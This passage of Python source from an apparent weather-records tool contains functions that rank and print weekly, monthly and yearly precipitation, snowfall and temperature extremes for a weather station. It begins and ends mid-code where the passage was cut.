with >= {} Day(s) of Data".format(excludeweek+1))) print("{:-^59}".format("")) print("{:^19}|{:^19}|{:^19}".format("Rain","Snow","Avg Snow Depth")) print("{:-^19}|{:-^19}|{:-^19}".format("","","")) i = 0; j = 0; k = 0 ranked_i = []; ranked_j = []; ranked_k = [] for x in range(max(len(WEEKS_prcp),len(WEEKS_snow),len(WEEKS_snwd))): if x == 0: i += 1; j += 1; k += 1 else: try: if WEEKS_prcp[x].number != WEEKS_prcp[x-1].number: i += 1 if WEEKS_prcp[x].number == 0: i = qty + 1 except: i = qty + 1 try: if WEEKS_snow[x].number != WEEKS_snow[x-1].number: j += 1 if WEEKS_snow[x].number == 0: j = qty + 1 except: j = qty + 1 try: if WEEKS_snwd[x].number != WEEKS_snwd[x-1].number: k += 1 if WEEKS_snwd[x].number == 0: k = qty + 1 except: k = qty + 1 #print(i,j,k) if all(QTY > qty for QTY in [i,j,k]): break else: print(" {} | {} | {} ".format( "{:2}{} {:4} {}".format( i if i not in ranked_i and i <= qty and x <= len(WEEKS_prcp)-1 and WEEKS_prcp[x].number > 0 else "", "." if i not in ranked_i and i <= qty and x <= len(WEEKS_prcp)-1 and WEEKS_prcp[x].number > 0 else " ", WEEKS_prcp[x].year if i <= qty and x <= len(WEEKS_prcp)-1 and WEEKS_prcp[x].number > 0 else "", "{:5.2f}".format(WEEKS_prcp[x].number) if i <= qty and x <= len(WEEKS_prcp)-1 and WEEKS_prcp[x].number > 0 else " " ), "{:2}{} {:4} {}".format( j if j not in ranked_j and j <= qty and x <= len(WEEKS_snow)-1 and WEEKS_snow[x].number > 0 else "", "." if j not in ranked_j and j <= qty and x <= len(WEEKS_snow)-1 and WEEKS_snow[x].number > 0 else " ", WEEKS_snow[x].year if j <= qty and x <= len(WEEKS_snow)-1 and WEEKS_snow[x].number > 0 else "", "{:5.1f}".format(WEEKS_snow[x].number) if j <= qty and x <= len(WEEKS_snow)-1 and WEEKS_snow[x].number > 0 else " " ), "{:2}{} {:4} {}".format( k if k not in ranked_k and k <= qty and x <= len(WEEKS_snwd)-1 and WEEKS_snwd[x].number > 0 else "", "." if k not in ranked_k and k <= qty and x <= len(WEEKS_snwd)-1 and WEEKS_snwd[x].number > 0 else " ", WEEKS_snwd[x].year if k <= qty and x <= len(WEEKS_snwd)-1 and WEEKS_snwd[x].number > 0 else "", "{:5.1f}".format(WEEKS_snwd[x].number) if k <= qty and x <= len(WEEKS_snwd)-1 and WEEKS_snwd[x].number > 0 else " " ) )) if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) print("\n{:^106}".format("Temperature Records for the Week of {} {} - {} {}".format(calendar.month_abbr[wkorig.month],wkorig.day, calendar.month_abbr[(wkorig + datetime.timedelta(days=6)).month],(wkorig + datetime.timedelta(days=6)).day))) print("{:^106}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:^106}".format("Weeks with >= {} Day(s) of Data".format(excludeweek+1))) print("{:-^106}".format("")) print("{:^34}|{:^35}|{:^35}".format("TAVG","TMAX","TMIN")) print("{:-^34}|{:-^35}|{:-^35}".format("","","")) print("{:^16}|{:^17}|{:^17}|{:^17}|{:^17}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest")) print("{:-^16}|{:-^17}|{:-^17}|{:-^17}|{:-^17}|{:-^17}".format("","","","","","")) i = 0; j = 0; k = 0; l = 0; m = 0; n = 0 ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = [] for x in range(max(len(WEEKS_tavg),len(WEEKS_tmax),len(WEEKS_tmin))): if x == 0: i += 1; j += 1; k += 1; l += 1; m += 1; n += 1 else: try: if WEEKS_tavg[x].number != WEEKS_tavg[x-1].number: i += 1 except: i = qty + 1 try: if WEEKS_tavg_asc[x].number != WEEKS_tavg_asc[x-1].number: j += 1 except: j = qty + 1 try: if WEEKS_tmax[x].number != WEEKS_tmax[x-1].number: k += 1 except: k = qty + 1 try: if WEEKS_tmax_asc[x].number != WEEKS_tmax_asc[x-1].number: l += 1 except: l = qty + 1 try: if WEEKS_tmin[x].number != WEEKS_tmin[x-1].number: m += 1 except: m = qty + 1 try: if WEEKS_tmin_asc[x].number != WEEKS_tmin_asc[x-1].number: n += 1 except: n = qty + 1 if all(QTY > qty for QTY in [i,j,k,l,m,n]): break else: print("{} | {} | {} | {} | {} | {} ".format( "{:2}{} {:4} {}".format( i if i not in ranked_i and i <= qty else "", "." if i not in ranked_i and i <= qty else " ", WEEKS_tavg[x].year if i <= qty else "", "{:5.1f}".format(WEEKS_tavg[x].number) if i <= qty else " " ), "{:2}{} {:4} {}".format( j if j not in ranked_j and j <= qty else "", "." if j not in ranked_j and j <= qty else " ", WEEKS_tavg_asc[x].year if j <= qty else "", "{:5.1f}".format(WEEKS_tavg_asc[x].number) if j <= qty else " " ), "{:2}{} {:4} {}".format( k if k not in ranked_k and k <= qty else "", "." if k not in ranked_k and k <= qty else " ", WEEKS_tmax[x].year if k <= qty else "", "{:5.1f}".format(WEEKS_tmax[x].number) if k <= qty else " " ), "{:2}{} {:4} {}".format( l if l not in ranked_l and l <= qty else "", "." if l not in ranked_l and l <= qty else " ", WEEKS_tmax_asc[x].year if l <= qty else "", "{:5.1f}".format(WEEKS_tmax_asc[x].number) if l <= qty else " " ), "{:2}{} {:4} {}".format( m if m not in ranked_m and m <= qty else "", "." if m not in ranked_m and m <= qty else " ", WEEKS_tmin[x].year if m <= qty else "", "{:5.1f}".format(WEEKS_tmin[x].number) if m <= qty else " " ), "{:2}{} {:4} {}".format( n if n not in ranked_n and n <= qty else "", "." if n not in ranked_n and n <= qty else " ", WEEKS_tmin_asc[x].year if n <= qty else "", "{:5.1f}".format(WEEKS_tmin_asc[x].number) if n <= qty else " " ) )) #print("---",i,j,k,l,m,n,"---") if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) print("") def monthRank(mo,attribute,qty): """Returns a list of rankings (maxs and mins) based on a specific month. It only accepts arguments for the month, the kind of stats ("prcp" or "temps"), and how many rankings you want to list (ie, top 10; 15; etc). The attribute MUST be in string format, while the month and quantity MUST be integers. monthRank(month,attribute,quantity) EXAMPLE: monthRank(3,"rain",20) -> Returns the "Top 20" Precipitation Rankings for March """ class month_attr: def __init__(self,y,mo,number): self.year = y self.month = mo self.number = number if type(mo) != int or mo < 1 or mo > 12: return print("* OOPS! {} is an invalid month. Ensure type(m) == int and is range [1,12]".format(mo)) if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]") if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp" if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp" MONTHS_prcp = [] MONTHS_prcp_asc = [] # Declared here bc it will be compiled with in for-loop MONTHS_prcpDAYS = [] MONTHS_prcpDAYS_asc = [] # Declared here bc it will be compiled with in for-loop MONTHS_snow = [] MONTHS_snowDAYS = [] MONTHS_tavg = [] MONTHS_tmax = [] MONTHS_tmin = [] for y in [YR for YR in clmt if type(YR) == int]: try: MONTHS_prcp.append(month_attr(y,mo,round(sum(clmt[y][mo]["prcp"]),2))) MONTHS_prcpDAYS.append(month_attr(y,mo,clmt[y][mo]["prcpDAYS"])) if clmt[y][mo]["recordqty"] > excludemonth: MONTHS_prcp_asc.append(month_attr(y,mo,round(sum(clmt[y][mo]["prcp"]),2))) MONTHS_prcpDAYS_asc.append(month_attr(y,mo,clmt[y][mo]["prcpDAYS"])) MONTHS_snow.append(month_attr(y,mo,round(sum(clmt[y][mo]["snow"]),1))) MONTHS_snowDAYS.append(month_attr(y,mo,clmt[y][mo]["snowDAYS"])) except: pass try: if len(clmt[y][mo]["tempAVGlist"]) > excludemonth_tavg: MONTHS_tavg.append(month_attr(y,mo,round(mean(clmt[y][mo]["tempAVGlist"]),1))) except: pass try: if len(clmt[y][mo]["tmax"]) > excludemonth: MONTHS_tmax.append(month_attr(y,mo,round(mean(clmt[y][mo]["tmax"]),1))) except: pass try: if len(clmt[y][mo]["tmin"]) > excludemonth: MONTHS_tmin.append(month_attr(y,mo,round(mean(clmt[y][mo]["tmin"]),1))) except: pass #MONTHS_prcp_asc = MONTHS_prcp.copy() MONTHS_prcp.sort(key=lambda x:x.number,reverse=True) MONTHS_prcp_asc.sort(key=lambda x:x.number) #MONTHS_prcpDAYS_asc = MONTHS_prcpDAYS.copy() MONTHS_prcpDAYS.sort(key=lambda x:x.number,reverse=True) MONTHS_prcpDAYS_asc.sort(key=lambda x:x.number) MONTHS_snow.sort(key=lambda x:x.number,reverse=True) MONTHS_snowDAYS.sort(key=lambda x:x.number,reverse=True) MONTHS_tavg_asc = MONTHS_tavg.copy() MONTHS_tavg.sort(key=lambda x:x.number,reverse=True) MONTHS_tavg_asc.sort(key=lambda x:x.number) MONTHS_tmax_asc = MONTHS_tmax.copy() MONTHS_tmax.sort(key=lambda x:x.number,reverse=True) MONTHS_tmax_asc.sort(key=lambda x:x.number) MONTHS_tmin_asc = MONTHS_tmin.copy() MONTHS_tmin.sort(key=lambda x:x.number,reverse=True) MONTHS_tmin_asc.sort(key=lambda x:x.number) # print("{:67}|{:32}") # print("{:18}|{:18}|{:14}|{:14}|{:17}|{:14}") # print(" {:2}{} {:4} {:6} | {:2}{} {:4} {:6} | {:2}{} {:4} {:2} | {:2}{} {:4} {:2} | {:2}{} {:4} {:5} | {:2}{} {:4} {:2} " # print(" {:2}{} {:4} {:2} | {:2}{} {:4} {:2} " print("") if attribute == "prcp": print("{:^100}".format("Ranked {} Monthly Precipitation Amounts and Days".format(calendar.month_name[mo]))) print("{:^100}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:^100}".format("Months with >= {} Day(s) of Data".format(excludemonth+1))) print("{:-^100}".format("")) print("{:^67}|{:^32}".format("Rain","Snow")) print("{:-^67}|{:-^32}".format("","")) print("{:^18}|{:^18}|{:^14}|{:^14}|{:^17}|{:^14}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days")) print("{:-^18}|{:-^18}|{:-^14}|{:-^14}|{:-^17}|{:-^14}".format("","","","","","")) i = 1;j = 1;k = 1;l = 1;m = 1;n = 1 ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = [] for x in range(min(len(MONTHS_prcp),len(MONTHS_prcp_asc),len(MONTHS_prcpDAYS_asc),len(MONTHS_prcpDAYS),len(MONTHS_snow),len(MONTHS_snowDAYS))): if x == 0: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:2} | {:2}{} {:4} {:2} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>2} ".format( 1,".",MONTHS_prcp[x].year,"{:.2f}".format(MONTHS_prcp[x].number), 1,".",MONTHS_prcp_asc[x].year,"{:.2f}".format(MONTHS_prcp_asc[x].number), 1,".",MONTHS_prcpDAYS[x].year,MONTHS_prcpDAYS[x].number, 1,".",MONTHS_prcpDAYS_asc[x].year,MONTHS_prcpDAYS_asc[x].number, 1 if MONTHS_snow[x].number else "","." if MONTHS_snow[x].number > 0 else " ", MONTHS_snow[x].year if MONTHS_snow[x].number > 0 else "","{:.1f}".format(MONTHS_snow[x].number) if MONTHS_snow[x].number > 0 else "", 1 if MONTHS_snowDAYS[x].number > 0 else "","." if MONTHS_snowDAYS[x].number > 0 else " ", MONTHS_snowDAYS[x].year if MONTHS_snowDAYS[x].number > 0 else "",MONTHS_snowDAYS[x].number if MONTHS_snowDAYS[x].number > 0 else "")) ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if MONTHS_prcp[x].number != MONTHS_prcp[x-1].number: i += 1 if MONTHS_prcp_asc[x].number != MONTHS_prcp_asc[x-1].number: j += 1 if MONTHS_prcpDAYS[x].number != MONTHS_prcpDAYS[x-1].number: k += 1 if MONTHS_prcpDAYS_asc[x].number != MONTHS_prcpDAYS_asc[x-1].number: l += 1 if MONTHS_snow[x].number != MONTHS_snow[x-1].number: m += 1 if MONTHS_snowDAYS[x].number != MONTHS_snowDAYS[x-1].number: n += 1 if MONTHS_prcp[x].number == 0: i = qty + 1 if MONTHS_prcpDAYS[x].number == 0: k = qty + 1 if MONTHS_snow[x].number == 0: m = qty + 1 if MONTHS_snowDAYS[x].number == 0: n = qty + 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:2} | {:2}{} {:4} {:2} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>2} ".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", MONTHS_prcp[x].year if i <= qty else "","{:.2f}".format(MONTHS_prcp[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", MONTHS_prcp_asc[x].year if j <= qty else "","{:.2f}".format(MONTHS_prcp_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", MONTHS_prcpDAYS[x].year if k <= qty else "",MONTHS_prcpDAYS[x].number if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", MONTHS_prcpDAYS_asc[x].year if l <= qty else "",MONTHS_prcpDAYS_asc[x].number if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", MONTHS_snow[x].year if m <= qty else "","{:.1f}".format(MONTHS_snow[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", MONTHS_snowDAYS[x].year if n <= qty else "",MONTHS_snowDAYS[x].number if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break if attribute == "temp": print("{:^111}".format("Ranked {} Monthly Temperatures".format(calendar.month_name[mo]))) print("{:^111}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:^111}".format("Months with >= {} Day(s) of Data".format(excludemonth+1))) print("{:-^111}".format("")) print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN")) print("{:-^36}|{:-^37}|{:-^36}".format("","","")) print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest")) print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","","")) i = 1; j = 1; k = 1; l = 1; m = 1; n = 1 ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = [] for x in range(len(MONTHS_tmax)): if x == 0: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( 1,".",MONTHS_tavg[x].year,"{:.1f}".format(MONTHS_tavg[x].number), 1,".",MONTHS_tavg_asc[x].year,"{:.1f}".format(MONTHS_tavg_asc[x].number), 1,".",MONTHS_tmax[x].year,"{:.1f}".format(MONTHS_tmax[x].number), 1,".",MONTHS_tmax_asc[x].year,"{:.1f}".format(MONTHS_tmax_asc[x].number), 1,".",MONTHS_tmin[x].year,"{:.1f}".format(MONTHS_tmin[x].number), 1,".",MONTHS_tmin_asc[x].year,"{:.1f}".format(MONTHS_tmin_asc[x].number))) ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if MONTHS_tavg[x].number != MONTHS_tavg[x-1].number: i += 1 if MONTHS_tavg_asc[x].number != MONTHS_tavg_asc[x-1].number: j += 1 if MONTHS_tmax[x].number != MONTHS_tmax[x-1].number: k += 1 if MONTHS_tmax_asc[x].number != MONTHS_tmax_asc[x-1].number: l += 1 if MONTHS_tmin[x].number != MONTHS_tmin[x-1].number: m += 1 if MONTHS_tmin_asc[x].number != MONTHS_tmin_asc[x-1].number: n += 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", MONTHS_tavg[x].year if i <= qty else "","{:.1f}".format(MONTHS_tavg[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", MONTHS_tavg_asc[x].year if j <= qty else "","{:.1f}".format(MONTHS_tavg_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", MONTHS_tmax[x].year if k <= qty else "","{:.1f}".format(MONTHS_tmax[x].number) if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", MONTHS_tmax_asc[x].year if l <= qty else "","{:.1f}".format(MONTHS_tmax_asc[x].number) if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", MONTHS_tmin[x].year if m <= qty else "","{:.1f}".format(MONTHS_tmin[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", MONTHS_tmin_asc[x].year if n <= qty else "","{:.1f}".format(MONTHS_tmin_asc[x].number) if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break print("") def yearRank(attribute,qty,**kwargs): """Returns a list of rankings (maxs and mins) for all years on record. It only accepts arguments for the kind of stats ("prcp" or "temps") desired, and how many rankings you want to list (ie, top 10; 15; etc). The attribute MUST be in string format, while the quantity MUST be an integer. yearRank(attribute,quantity) EXAMPLE: yearRank("temp",15) -> Returns the "Top 15" Temperature-based Rankings for all calendar years on record * The kwargs option is not available to the user. it is used internally by yearStats """ class month_attr: def __init__(self,y,number): self.year = y self.number = number if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]") if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp" if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp" YEARS_prcp = [] YEARS_prcp_asc = [] YEARS_prcpDAYS = [] YEARS_prcpDAYS_asc = [] YEARS_snow = [] YEARS_snow_asc = [] YEARS_snowDAYS = [] YEARS_snowDAYS_asc = [] YEARS_tavg = [] YEARS_tmax = [] YEARS_tmin = [] for y in [YR for YR in clmt if type(YR) == int]: try: YEARS_prcp.append(month_attr(y,round(sum(clmt[y]["prcp"]),2))) YEARS_prcpDAYS.append(month_attr(y,clmt[y]["prcpDAYS"])) if clmt[y]["recordqty"] > excludeyear: YEARS_prcp_asc.append(month_attr(y,round(sum(clmt[y]["prcp"]),2))) YEARS_prcpDAYS_asc.append(month_attr(y,clmt[y]["prcpDAYS"])) YEARS_snow.append(month_attr(y,round(sum(clmt[y]["snow"]),1))) if clmt[y]["recordqty"] > excludeyear: YEARS_snow_asc.append(month_attr(y,round(sum(clmt[y]["snow"]),1))) YEARS_snowDAYS.append(month_attr(y,clmt[y]["snowDAYS"])) if clmt[y]["recordqty"] > excludeyear: YEARS_snowDAYS_asc.append(month_attr(y,clmt[y]["snowDAYS"])) except: pass try: if len(clmt[y]["tempAVGlist"]) > excludeyear_tavg: YEARS_tavg.append(month_attr(y,round(mean(clmt[y]["tempAVGlist"]),1))) except: pass try: if len(clmt[y]["tmax"]) > excludeyear: YEARS_tmax.append(month_attr(y,round(mean(clmt[y]["tmax"]),1))) except: pass try: if len(clmt[y]["tmin"]) > excludeyear: YEARS_tmin.append(month_attr(y,round(mean(clmt[y]["tmin"]),1))) except: pass #YEARS_prcp_asc = YEARS_prcp.copy() YEARS_prcp.sort(key=lambda x:x.number,reverse=True) YEARS_prcp_asc.sort(key=lambda x:x.number) #YEARS_prcpDAYS_asc = YEARS_prcpDAYS.copy() YEARS_prcpDAYS.sort(key=lambda x:x.number,reverse=True) YEARS_prcpDAYS_asc.sort(key=lambda x:x.number) YEARS_snow.sort(key=lambda x:x.number,reverse=True) YEARS_snow_asc.sort(key=lambda x:x.number) YEARS_snowDAYS.sort(key=lambda x:x.number,reverse=True) YEARS_snowDAYS_asc.sort(key=lambda x:x.number) YEARS_tavg_asc = YEARS_tavg.copy() YEARS_tavg.sort(key=lambda x:x.number,reverse=True) YEARS_tavg_asc.sort(key=lambda x:x.number) YEARS_tmax_asc = YEARS_tmax.copy() YEARS_tmax.sort(key=lambda x:x.number,reverse=True) YEARS_tmax_asc.sort(key=lambda x:x.number) YEARS_tmin_asc = YEARS_tmin.copy() YEARS_tmin.sort(key=lambda x:x.number,reverse=True) YEARS_tmin_asc.sort(key=lambda x:x.number) if "yearStatsRun" in kwargs and kwargs["yearStatsRun"] == True: prcpaschist = sorted(list(set([x.number for x in YEARS_prcp_asc]))) prcpdeschist = sorted(list(set([x.number for x in YEARS_prcp])),reverse=True) prcpDAYSaschist = sorted(list(set([x.number for x in YEARS_prcpDAYS_asc]))) prcpDAYSdeschist = sorted(list(set([x.number for x in YEARS_prcpDAYS])),reverse=True) snowaschist = sorted(list(set([x.number for x in YEARS_snow_asc]))) snowdeschist = sorted(list(set([x.number for x in YEARS_snow])),reverse=True) snowDAYSaschist = sorted(list(set([x.number for x in YEARS_snowDAYS_asc]))) snowDAYSdeschist = sorted(list(set([x.number for x in YEARS_snowDAYS])),reverse=True) tmaxaschist = sorted(list(set([x.number for x in YEARS_tmax_asc]))) tmaxdeschist = sorted(list(set([x.number for x in YEARS_tmax])),reverse=True) tminaschist = sorted(list(set([x.number for x in YEARS_tmin_asc]))) tmindeschist = sorted(list(set([x.number for x in YEARS_tmin])),reverse=True) tavgaschist = sorted(list(set([x.number for x in YEARS_tavg_asc]))) tavgdeschist = sorted(list(set([x.number for x in YEARS_tavg])),reverse=True) return prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist else: print("") if attribute == "prcp": print("{:^103}".format("Ranked Yearly Precipitation Amounts and Days")) print("{:^103}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:^103}".format("Years with >= {} day(s) of data".format(excludeyear+1))) print("{:-^103}".format("")) print("{:^69}|{:^33}".format("Rain","Snow")) print("{:-^69}|{:-^33}".format("","")) print("{:^18}|{:^18}|{:^15}|{:^15}|{:^17}|{:^15}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days")) print("{:-^18}|{:-^18}|{:-^15}|{:-^15}|{:-^17}|{:-^15}".format("","","","","","")) i = 1;j = 1;k = 1;l = 1;m = 1;n = 1 ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = [] for x in range(min(len(YEARS_prcp),len(YEARS_prcp_asc),len(YEARS_prcpDAYS_asc),len(YEARS_prcpDAYS),len(YEARS_snow),len(YEARS_snowDAYS))): if x == 0: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( 1,".",YEARS_prcp[x].year,"{:.2f}".format(YEARS_prcp[x].number), 1,".",YEARS_prcp_asc[x].year,"{:.2f}".format(YEARS_prcp_asc[x].number), 1,".",YEARS_prcpDAYS[x].year,YEARS_prcpDAYS[x].number, 1,".",YEARS_prcpDAYS_asc[x].year,YEARS_prcpDAYS_asc[x].number, 1 if YEARS_snow[x].number else "","." if YEARS_snow[x].number > 0 else " ", YEARS_snow[x].year if YEARS_snow[x].number > 0 else "","{:.1f}".format(YEARS_snow[x].number) if YEARS_snow[x].number > 0 else "", 1 if YEARS_snowDAYS[x].number > 0 else "","." if YEARS_snowDAYS[x].number > 0 else " ", YEARS_snowDAYS[x].year if YEARS_snowDAYS[x].number > 0 else "",YEARS_snowDAYS[x].number if YEARS_snowDAYS[x].number > 0 else "")) ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if YEARS_prcp[x].number != YEARS_prcp[x-1].number: i += 1 if YEARS_prcp_asc[x].number != YEARS_prcp_asc[x-1].number: j += 1 if YEARS_prcpDAYS[x].number != YEARS_prcpDAYS[x-1].number: k += 1 if YEARS_prcpDAYS_asc[x].number != YEARS_prcpDAYS_asc[x-1].number: l += 1 if YEARS_snow[x].number != YEARS_snow[x-1].number: m += 1 if YEARS_snowDAYS[x].number != YEARS_snowDAYS[x-1].number: n += 1 if YEARS_prcp[x].number == 0: i = qty + 1 if YEARS_prcpDAYS[x].number == 0: k = qty + 1 if YEARS_snow[x].number == 0: m = qty + 1 if YEARS_snowDAYS[x].number == 0: n = qty + 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", YEARS_prcp[x].year if i <= qty else "","{:.2f}".format(YEARS_prcp[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", YEARS_prcp_asc[x].year if j <= qty else "","{:.2f}".format(YEARS_prcp_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", YEARS_prcpDAYS[x].year if k <= qty else "",YEARS_prcpDAYS[x].number if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", YEARS_prcpDAYS_asc[x].year if l <= qty else "",YEARS_prcpDAYS_asc[x].number if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", YEARS_snow[x].year if m <= qty else "","{:.1f}".format(YEARS_snow[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", YEARS_snowDAYS[x].year if n <= qty else "",YEARS_snowDAYS[x].number if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break if attribute == "temp": print("{:^111}".format("Ranked Yearly Temperatures")) print("{:^111}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:^111}".format("Years with >= {} day(s) of data".format(excludeyear+1))) print("{:-^111}".format("")) print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN")) print("{:-^36}|{:-^37}|{:-^36}".format("","","")) print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest")) print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","","")) i = 1; j = 1; k = 1; l = 1; m = 1; n = 1 ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = [] for x in range(len(YEARS_tmax)): if x == 0: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( 1,".",YEARS_tavg[x].year,"{:.1f}".format(YEARS_tavg[x].number), 1,".",YEARS_tavg_asc[x].year,"{:.1f}".format(YEARS_tavg_asc[x].number), 1,".",YEARS_tmax[x].year,"{:.1f}".format(YEARS_tmax[x].number), 1,".",YEARS_tmax_asc[x].year,"{:.1f}".format(YEARS_tmax_asc[x].number), 1,".",YEARS_tmin[x].year,"{:.1f}".format(YEARS_tmin[x].number), 1,".",YEARS_tmin_asc[x].year,"{:.1f}".format(YEARS_tmin_asc[x].number))) ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l 